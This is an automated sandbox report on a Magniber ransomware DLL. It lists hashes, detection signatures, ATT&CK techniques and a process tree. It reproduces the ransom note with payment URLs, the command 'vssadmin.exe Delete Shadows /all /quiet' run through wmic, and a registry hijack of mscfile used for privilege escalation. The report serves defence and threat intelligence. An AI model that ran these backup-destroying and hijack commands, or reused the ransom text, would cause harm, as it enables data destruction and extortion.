magniber | 652e1eac5b19ff783f453fbca0afcabd7ede53dac6eec6e1d35cbad346078f90

Analysis

max time kernel
15s
max time network
145s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
22-12-2023 01:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4a85c4bd950cd5034a5a06ad9f77c08c.dll
Size

38KB
MD5

4a85c4bd950cd5034a5a06ad9f77c08c
SHA1

c95573edb69411a4aeb106567d04c4871c46c7eb
SHA256

652e1eac5b19ff783f453fbca0afcabd7ede53dac6eec6e1d35cbad346078f90
SHA512

9c84dc894351798c69faf92e6ca93b2174ac0fad9df05b2dd63154347b9c750339d317f261ef4ef541334a8ef8ce5a80ff5be1f9e58908a11373778b7ab7b6e9
SSDEEP

768:vDjer4oprwpTVpy4Th3ev7o6i0W6njYqnOU7ieRt7HGNwvzl8:XerBwNVQ4Qdi0djZnOU7i2t7HGKJ

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://66c4688056c4902034exvjphh.7ckkscprdlxe7vtmcdbsj2xln65hob6etvwpo3hatwee34if67nrqrad.onion/exvjphh Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://66c4688056c4902034exvjphh.wanttwo.site/exvjphh http://66c4688056c4902034exvjphh.holdleg.space/exvjphh http://66c4688056c4902034exvjphh.hidmove.xyz/exvjphh http://66c4688056c4902034exvjphh.sleepso.top/exvjphh Note! These are temporary addresses! They will be available for a limited amount of time! ?�

URLs

http://66c4688056c4902034exvjphh.7ckkscprdlxe7vtmcdbsj2xln65hob6etvwpo3hatwee34if67nrqrad.onion/exvjphh

http://66c4688056c4902034exvjphh.wanttwo.site/exvjphh

http://66c4688056c4902034exvjphh.holdleg.space/exvjphh

http://66c4688056c4902034exvjphh.hidmove.xyz/exvjphh

http://66c4688056c4902034exvjphh.sleepso.top/exvjphh

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1672-1-0x0000000001EF0000-0x00000000026E2000-memory.dmp	family_magniber
behavioral1/memory/1068-16-0x00000000001B0000-0x00000000001B5000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2888	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1352	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1236	cmd.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2436	1236	cmd.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1920	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1296	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	560	1236	cmd.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1472	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	348	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	1236	cmd.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	1236	vssadmin.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	1236	vssadmin.exe	31

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (62) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1672 set thread context of 1068	1672	rundll32.exe	10
PID 1672 set thread context of 1100	1672	rundll32.exe	9
PID 1672 set thread context of 1132	1672	rundll32.exe	8
PID 1672 set thread context of 1584	1672	rundll32.exe	5

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2888	vssadmin.exe
1352	vssadmin.exe
1920	vssadmin.exe
1296	vssadmin.exe
1472	vssadmin.exe
348	vssadmin.exe
2208	vssadmin.exe
804	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4A8C4571-A14B-11EE-A5DE-CE253106968E} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell\open	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000_CLASSES\mscfile	rundll32.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1064	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1672	rundll32.exe
1672	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1672	rundll32.exe
1672	rundll32.exe
1672	rundll32.exe
1672	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1100	Explorer.EXE
Token: SeShutdownPrivilege	1100	Explorer.EXE
Token: SeShutdownPrivilege	1100	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1128	wmic.exe
Token: SeSecurityPrivilege	1128	wmic.exe
Token: SeTakeOwnershipPrivilege	1128	wmic.exe
Token: SeLoadDriverPrivilege	1128	wmic.exe
Token: SeSystemProfilePrivilege	1128	wmic.exe
Token: SeSystemtimePrivilege	1128	wmic.exe
Token: SeProfSingleProcessPrivilege	1128	wmic.exe
Token: SeIncBasePriorityPrivilege	1128	wmic.exe
Token: SeCreatePagefilePrivilege	1128	wmic.exe
Token: SeBackupPrivilege	1128	wmic.exe
Token: SeRestorePrivilege	1128	wmic.exe
Token: SeShutdownPrivilege	1128	wmic.exe
Token: SeDebugPrivilege	1128	wmic.exe
Token: SeSystemEnvironmentPrivilege	1128	wmic.exe
Token: SeRemoteShutdownPrivilege	1128	wmic.exe
Token: SeUndockPrivilege	1128	wmic.exe
Token: SeManageVolumePrivilege	1128	wmic.exe
Token: 33	1128	wmic.exe
Token: 34	1128	wmic.exe
Token: 35	1128	wmic.exe
Token: SeIncreaseQuotaPrivilege	2512	WMIC.exe
Token: SeSecurityPrivilege	2512	WMIC.exe
Token: SeTakeOwnershipPrivilege	2512	WMIC.exe
Token: SeLoadDriverPrivilege	2512	WMIC.exe
Token: SeSystemProfilePrivilege	2512	WMIC.exe
Token: SeSystemtimePrivilege	2512	WMIC.exe
Token: SeProfSingleProcessPrivilege	2512	WMIC.exe
Token: SeIncBasePriorityPrivilege	2512	WMIC.exe
Token: SeCreatePagefilePrivilege	2512	WMIC.exe
Token: SeBackupPrivilege	2512	WMIC.exe
Token: SeRestorePrivilege	2512	WMIC.exe
Token: SeShutdownPrivilege	2512	WMIC.exe
Token: SeDebugPrivilege	2512	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2512	WMIC.exe
Token: SeRemoteShutdownPrivilege	2512	WMIC.exe
Token: SeUndockPrivilege	2512	WMIC.exe
Token: SeManageVolumePrivilege	2512	WMIC.exe
Token: 33	2512	WMIC.exe
Token: 34	2512	WMIC.exe
Token: 35	2512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1128	wmic.exe
Token: SeSecurityPrivilege	1128	wmic.exe
Token: SeTakeOwnershipPrivilege	1128	wmic.exe
Token: SeLoadDriverPrivilege	1128	wmic.exe
Token: SeSystemProfilePrivilege	1128	wmic.exe
Token: SeSystemtimePrivilege	1128	wmic.exe
Token: SeProfSingleProcessPrivilege	1128	wmic.exe
Token: SeIncBasePriorityPrivilege	1128	wmic.exe
Token: SeCreatePagefilePrivilege	1128	wmic.exe
Token: SeBackupPrivilege	1128	wmic.exe
Token: SeRestorePrivilege	1128	wmic.exe
Token: SeShutdownPrivilege	1128	wmic.exe
Token: SeDebugPrivilege	1128	wmic.exe
Token: SeSystemEnvironmentPrivilege	1128	wmic.exe
Token: SeRemoteShutdownPrivilege	1128	wmic.exe
Token: SeUndockPrivilege	1128	wmic.exe
Token: SeManageVolumePrivilege	1128	wmic.exe
Token: 33	1128	wmic.exe
Token: 34	1128	wmic.exe
Token: 35	1128	wmic.exe
Token: SeIncreaseQuotaPrivilege	2512	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3028	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3028	iexplore.exe
3028	iexplore.exe
2952	IEXPLORE.EXE
2952	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1100	Explorer.EXE
1100	Explorer.EXE

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1672 wrote to memory of 1064	1672	rundll32.exe	50
PID 1672 wrote to memory of 1064	1672	rundll32.exe	50
PID 1672 wrote to memory of 1064	1672	rundll32.exe	50
PID 1672 wrote to memory of 1436	1672	rundll32.exe	49
PID 1672 wrote to memory of 1436	1672	rundll32.exe	49
PID 1672 wrote to memory of 1436	1672	rundll32.exe	49
PID 1672 wrote to memory of 1128	1672	rundll32.exe	47
PID 1672 wrote to memory of 1128	1672	rundll32.exe	47
PID 1672 wrote to memory of 1128	1672	rundll32.exe	47
PID 1672 wrote to memory of 576	1672	rundll32.exe	46
PID 1672 wrote to memory of 576	1672	rundll32.exe	46
PID 1672 wrote to memory of 576	1672	rundll32.exe	46
PID 576 wrote to memory of 2512	576	cmd.exe	29
PID 576 wrote to memory of 2512	576	cmd.exe	29
PID 576 wrote to memory of 2512	576	cmd.exe	29
PID 1436 wrote to memory of 3028	1436	cmd.exe	45
PID 1436 wrote to memory of 3028	1436	cmd.exe	45
PID 1436 wrote to memory of 3028	1436	cmd.exe	45
PID 1608 wrote to memory of 2940	1608	cmd.exe	40
PID 1608 wrote to memory of 2940	1608	cmd.exe	40
PID 1608 wrote to memory of 2940	1608	cmd.exe	40
PID 3028 wrote to memory of 2952	3028	iexplore.exe	39
PID 3028 wrote to memory of 2952	3028	iexplore.exe	39
PID 3028 wrote to memory of 2952	3028	iexplore.exe	39
PID 3028 wrote to memory of 2952	3028	iexplore.exe	39
PID 2940 wrote to memory of 2632	2940	CompMgmtLauncher.exe	38
PID 2940 wrote to memory of 2632	2940	CompMgmtLauncher.exe	38
PID 2940 wrote to memory of 2632	2940	CompMgmtLauncher.exe	38
PID 1068 wrote to memory of 2868	1068	Dwm.exe	56
PID 1068 wrote to memory of 2868	1068	Dwm.exe	56
PID 1068 wrote to memory of 2868	1068	Dwm.exe	56
PID 1068 wrote to memory of 2956	1068	Dwm.exe	54
PID 1068 wrote to memory of 2956	1068	Dwm.exe	54
PID 1068 wrote to memory of 2956	1068	Dwm.exe	54
PID 2956 wrote to memory of 1736	2956	cmd.exe	55
PID 2956 wrote to memory of 1736	2956	cmd.exe	55
PID 2956 wrote to memory of 1736	2956	cmd.exe	55
PID 2436 wrote to memory of 2460	2436	cmd.exe	61
PID 2436 wrote to memory of 2460	2436	cmd.exe	61
PID 2436 wrote to memory of 2460	2436	cmd.exe	61

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1584

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
PID:1132
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:1036
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1256
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2444

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:1100
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\4a85c4bd950cd5034a5a06ad9f77c08c.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:576
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
- - C:\Windows\system32\cmd.exe
    cmd /c "start http://66c4688056c4902034exvjphh.wanttwo.site/exvjphh^&2^&45258566^&62^&323^&12"?
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1436
- - C:\Windows\system32\notepad.exe
    notepad.exe C:\Users\Public\readme.txt?
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1064
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:212
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:204

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1736
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2868

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2888

C:\Windows\system32\wbem\wmic.exe
"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
1⤵
PID:2632

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3028 CREDAT:275457 /prefetch:2
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2952

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1352

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1608

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://66c4688056c4902034exvjphh.wanttwo.site/exvjphh&2&45258566&62&323&12?
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3028

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2460
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1572

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1920

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1296

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:1980

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
PID:1556
- C:\Windows\system32\wbem\wmic.exe
  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1772

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:560

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1472

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:348

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:2944
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2228
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:384

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2208

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9525259b2efb5d1d9ce0c4d1d29b854b

SHA1
cf3d44c7b172fd19ba7039e7b6375fa849504e41

SHA256
db09f8b52ebfa6f8861030b50e2a876f89a306f0b2c0308db2085a7eced2079e

SHA512
8c4a75bf8097b93a64b95c5a68cae1c38d93ee60b9a77d932599774fabe272b6d01e5b36e1d979316830306517f62f2b28d3f809717bbbb8fb84d2c926306841

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
847909274cb749cfc176b65fa70d7645

SHA1
547ea6dda8d15705a3a7ef471b730ef26679d546

SHA256
5307d210d6b922272f85485855b8f494f99da4840edf417d89abcbfd73163e05

SHA512
825fc8645f5bca931048ca12f448bd86ba7ea72d9af441e0f61e71a08cca615cd883662d8e594c99218c94392823606bf3d6a8bf1b9c02e3f0b31c6896923a8c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fb37f5a1a14ce9d2131504476d54d3d2

SHA1
76506b831363b7c9289098306099dd2d070bb582

SHA256
b901f3ebe2fcc5a45e57ded78dcde85765e319a26d32770ce5c08c2d1f36f25e

SHA512
9ef9af39152999e2ed6d35a2f9f03926dee1d00081bbd7f34fb03793604845081364ecf8229ff24897a9a4b9ad80e180cefa7da733d3090213f9c3086899de4b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8d495c2e076fc87053a48e5b28d21df8

SHA1
5849bef4f7d801148d7ad031328cce36c390301e

SHA256
d9be2e454a641c3218d34856a2b08b7e5acd333534c56c006bad1d634397c6da

SHA512
402b7889dd4cc3f61f2682c9390fcc0c18274dd875f5d593d473fb8ecf8cd453c5388f7dc916f2342bf64b684940bd2bb82c119125db97fc8239f17dda955687

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
14e1d42094be6d6958ea00733a9f9409

SHA1
beb8fe1e5555ec1e3108d41c2d62a16c0e9405ca

SHA256
20c5eecb6bf99d0870c0f4fdc511dc259fa87656d8b44b652af9d27f76aeb7a4

SHA512
9929636f2c10e24bced7c795731f257024411532dc4b3c5ca5629d0643829a738148ef3374440084f72994846e209ebb1bfee63261ffb529bfcf572bb20811a3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b56c372afc35d021762e05afca1d4226

SHA1
fae0b9d86a30116882bcb02e23750b396f7c4941

SHA256
0f34a430e5ed0320efd9b37124cded55f9d08e2aa06afe0558f19029980f8a12

SHA512
1c353dd890bf5947d040e672847591ab55d8c99b9a2da83d9516463a7a0815fbc346992bca687fe9916e7a8b94788a0b2e96bf2b31b1f73cded9196d60d363ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c1974257860fe27a3d73bdb1657d17a6

SHA1
3413336c3f22b44b166c163d377892766c15c389

SHA256
b34d4d5415c50534e45063b7c791d865723c1067b4cfd014680aca6fe9e13a27

SHA512
6e49ae34194483c69e1b96799f2509a4f949f35c81b4613151f98b07a17ce007951d9271bf2d7976fcc12ef5dde72b93a5c8e8f27be4faf21ea284dc625e3e97

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6611e0f981d52f41974cbee47847bf53

SHA1
eb99382b096d5e730805cc9080c5593fb9845d90

SHA256
52ddc187b4e2543f3c48d9171a4f105368c1c614a6055290fa926c07e442faf3

SHA512
49c8165ae1067961ee4e20553b62af2799f3849da97c5a376eda04affab1a432a9882782bf29c237c0da00391b9f37fb6ce997fb030fbf5918607924f5f02b3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4A9A.tmp

Filesize
41KB

MD5
963395affaf4cebbaf4bbf8e09d84150

SHA1
22851baaa897a578d18916f51d63edbe7eb823bd

SHA256
960a1276f7f2dd7338ff32e766055cf48e3ad323ab8b085661e6f205c88e7ffe

SHA512
4fd7d9d6c53ec16c48b640ca6e67040553ecde62d192021823f5503884286b22393e5e34ce55b3a782e5af766b7d23e2df829fc0b788b2d4637249f4eba3843d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4A9D.tmp

Filesize
124KB

MD5
b5b4b7da125a7b2ff02934820d7a1604

SHA1
cad3900d4f11638b6c4d623cd867e659ddd85527

SHA256
d5ee0cfcf1fb5ef6bacb07e91464a83573c223a1b78bff90dd7af6478e92cd02

SHA512
a93bf9ebcf1c7df28798a8f01d4d9d3c761cfe06d65a2561062ddd6c7f2613b695556406a8c8d00004f50fe6440ef093e59b42f6451ddf8792f00896b5c7fae2

Download Submit
C:\Users\Admin\Pictures\readme.txt婍

Filesize
1KB

MD5
3d2713c02dadbfef302ea40e1236ef87

SHA1
8d787d9e170e65f893c4b15bb049b821c0cb6927

SHA256
c67824fc717cf607a4cb46ddd8c10fd845df7d335700b66e2c3cf897f9868e07

SHA512
38eb5f83ee4a15b78e1b68b39e269ccc4cd9b93e52438904c544b36a213a37f4c0b4b812367a29834d6fcbeee0c26bd7867fa52b4ff20b9f604c3198dd2cafda

Download Submit
memory/1068-0-0x00000000001B0000-0x00000000001B5000-memory.dmp

Filesize
20KB

Download
